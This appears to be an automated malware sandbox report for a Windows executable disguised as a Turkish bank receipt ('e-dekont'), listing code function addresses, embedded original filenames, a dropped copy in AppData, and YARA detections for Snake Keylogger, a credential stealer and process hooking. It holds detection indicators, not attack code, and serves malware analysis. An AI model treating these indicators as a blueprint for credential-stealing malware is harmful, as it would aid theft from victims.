Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_0866A098	0_2_0866A098
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_0866D920	0_2_0866D920
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_0866D930	0_2_0866D930
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_0866D1B4	0_2_0866D1B4
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_08669AC8	0_2_08669AC8
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_08669AB8	0_2_08669AB8
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_0866EB68	0_2_0866EB68
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_0866D478	0_2_0866D478
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_08669C28	0_2_08669C28
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_08669C38	0_2_08669C38
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_0866D488	0_2_0866D488
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_0866E488	0_2_0866E488
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_08665EE0	0_2_08665EE0
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_08665EF0	0_2_08665EF0
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_086676FF	0_2_086676FF
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_08669EC8	0_2_08669EC8
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_0866D6C8	0_2_0866D6C8
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_0866D6D8	0_2_0866D6D8
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_086696A8	0_2_086696A8
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_086656B0	0_2_086656B0
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_08669EB8	0_2_08669EB8
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_08669698	0_2_08669698
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_08666760	0_2_08666760
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_086647E0	0_2_086647E0
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_086647F0	0_2_086647F0
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_086677F0	0_2_086677F0
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_0161C147	10_2_0161C147
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_0161A088	10_2_0161A088
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_01615362	10_2_01615362
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_0161D278	10_2_0161D278
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_0161C468	10_2_0161C468
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_0161C738	10_2_0161C738
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_016169A0	10_2_016169A0
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_0161E988	10_2_0161E988
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_0161CA08	10_2_0161CA08
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_0161CCD8	10_2_0161CCD8
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_01616FC8	10_2_01616FC8
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_0161CFAC	10_2_0161CFAC
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_01613E09	10_2_01613E09
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_0161F631	10_2_0161F631
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_0161E97C	10_2_0161E97C
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_016129EC	10_2_016129EC
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_01613AA1	10_2_01613AA1
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_0161FA88	10_2_0161FA88
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E51E80	10_2_06E51E80
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E517A0	10_2_06E517A0
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E50B30	10_2_06E50B30
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E55028	10_2_06E55028
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E5F810	10_2_06E5F810
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E59C18	10_2_06E59C18
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E52968	10_2_06E52968
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E59548	10_2_06E59548
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E5EAF8	10_2_06E5EAF8
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E5E6AF	10_2_06E5E6AF
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E5E6B0	10_2_06E5E6B0
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E51E70	10_2_06E51E70
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E5E249	10_2_06E5E249
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E5E258	10_2_06E5E258
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E5DE00	10_2_06E5DE00
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E58BA0	10_2_06E58BA0
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E5F3A8	10_2_06E5F3A8
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E5F3B8	10_2_06E5F3B8
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E5178F	10_2_06E5178F
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E5EF60	10_2_06E5EF60
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E5EF51	10_2_06E5EF51
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E50B20	10_2_06E50B20
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E5EB08	10_2_06E5EB08
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E5D0F8	10_2_06E5D0F8
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E5CCA0	10_2_06E5CCA0
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E5CC8F	10_2_06E5CC8F
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E5FC68	10_2_06E5FC68
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E50040	10_2_06E50040
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E50006	10_2_06E50006
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E5F801	10_2_06E5F801
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E55018	10_2_06E55018
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E5DDFF	10_2_06E5DDFF
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E5D9A8	10_2_06E5D9A8
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E5D999	10_2_06E5D999
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E5D540	10_2_06E5D540
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E5D550	10_2_06E5D550
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E5295B	10_2_06E5295B
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_00DBEFE4	11_2_00DBEFE4
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_027458C0	11_2_027458C0
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_027458B0	11_2_027458B0
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_07C4D790	11_2_07C4D790
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_07C47721	11_2_07C47721
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_07C47730	11_2_07C47730
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_07C48508	11_2_07C48508
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_07C48518	11_2_07C48518
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_07C45F20	11_2_07C45F20
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_07C45F30	11_2_07C45F30
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_07C47B57	11_2_07C47B57
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_07C47B68	11_2_07C47B68
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_07C45AF8	11_2_07C45AF8
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080A7800	11_2_080A7800
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080A68E2	11_2_080A68E2
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080AD1F0	11_2_080AD1F0
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080A7E40	11_2_080A7E40
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080A56D0	11_2_080A56D0
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080AF038	11_2_080AF038
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080AD920	11_2_080AD920
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080A9938	11_2_080A9938
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080AD930	11_2_080AD930
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080A9948	11_2_080A9948
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080AD1B8	11_2_080AD1B8
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080A9AA9	11_2_080A9AA9
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080A9AB8	11_2_080A9AB8
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080AEB68	11_2_080AEB68
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080AD478	11_2_080AD478
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080AE488	11_2_080AE488
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080AD488	11_2_080AD488
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080A9519	11_2_080A9519
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080A9D48	11_2_080A9D48
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080A9D45	11_2_080A9D45
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080AD6C8	11_2_080AD6C8
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080A86C9	11_2_080A86C9
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080A86D8	11_2_080A86D8
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080AD6D8	11_2_080AD6D8
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080A5EE0	11_2_080A5EE0
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080A76FF	11_2_080A76FF
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080A9F08	11_2_080A9F08
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080A6760	11_2_080A6760
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080A77DC	11_2_080A77DC
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080A47EA	11_2_080A47EA
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 16_2_00EFC146	16_2_00EFC146
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 16_2_00EFD278	16_2_00EFD278
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 16_2_00EF5362	16_2_00EF5362
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 16_2_00EFC468	16_2_00EFC468
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 16_2_00EFC738	16_2_00EFC738
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 16_2_00EF29E0	16_2_00EF29E0
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 16_2_00EF69A0	16_2_00EF69A0
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 16_2_00EFE988	16_2_00EFE988
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 16_2_00EFCA08	16_2_00EFCA08
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 16_2_00EFCCD8	16_2_00EFCCD8
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 16_2_00EF9DE0	16_2_00EF9DE0
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 16_2_00EF3E09	16_2_00EF3E09
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 16_2_00EF6FC8	16_2_00EF6FC8
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 16_2_00EFCFA9	16_2_00EFCFA9
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 16_2_00EFF631	16_2_00EFF631
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 16_2_00EFE97A	16_2_00EFE97A
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 16_2_00EFFA88	16_2_00EFFA88

Source: e-dekont_html.exe, 00000000.00000002.1360492109.00000000007BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs e-dekont_html.exe
Source: e-dekont_html.exe, 00000000.00000002.1373982401.000000000AF70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs e-dekont_html.exe
Source: e-dekont_html.exe, 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs e-dekont_html.exe
Source: e-dekont_html.exe, 00000000.00000000.1306298047.0000000000112000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameQrSB.exeB vs e-dekont_html.exe
Source: e-dekont_html.exe, 00000000.00000002.1366238188.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs e-dekont_html.exe
Source: e-dekont_html.exe, 00000000.00000002.1372684486.0000000006929000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs e-dekont_html.exe
Source: e-dekont_html.exe, 00000000.00000002.1367919376.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs e-dekont_html.exe
Source: e-dekont_html.exe, 0000000A.00000002.3785665812.0000000000444000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs e-dekont_html.exe
Source: e-dekont_html.exe, 0000000A.00000002.3786958978.00000000012F7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs e-dekont_html.exe
Source: e-dekont_html.exe	Binary or memory string: OriginalFilenameQrSB.exeB vs e-dekont_html.exe

Source: e-dekont_html.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.e-dekont_html.exe.4357f18.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.e-dekont_html.exe.439af38.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.e-dekont_html.exe.4357f18.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.e-dekont_html.exe.439af38.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.e-dekont_html.exe.439af38.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.e-dekont_html.exe.4357f18.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: e-dekont_html.exe PID: 7624, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
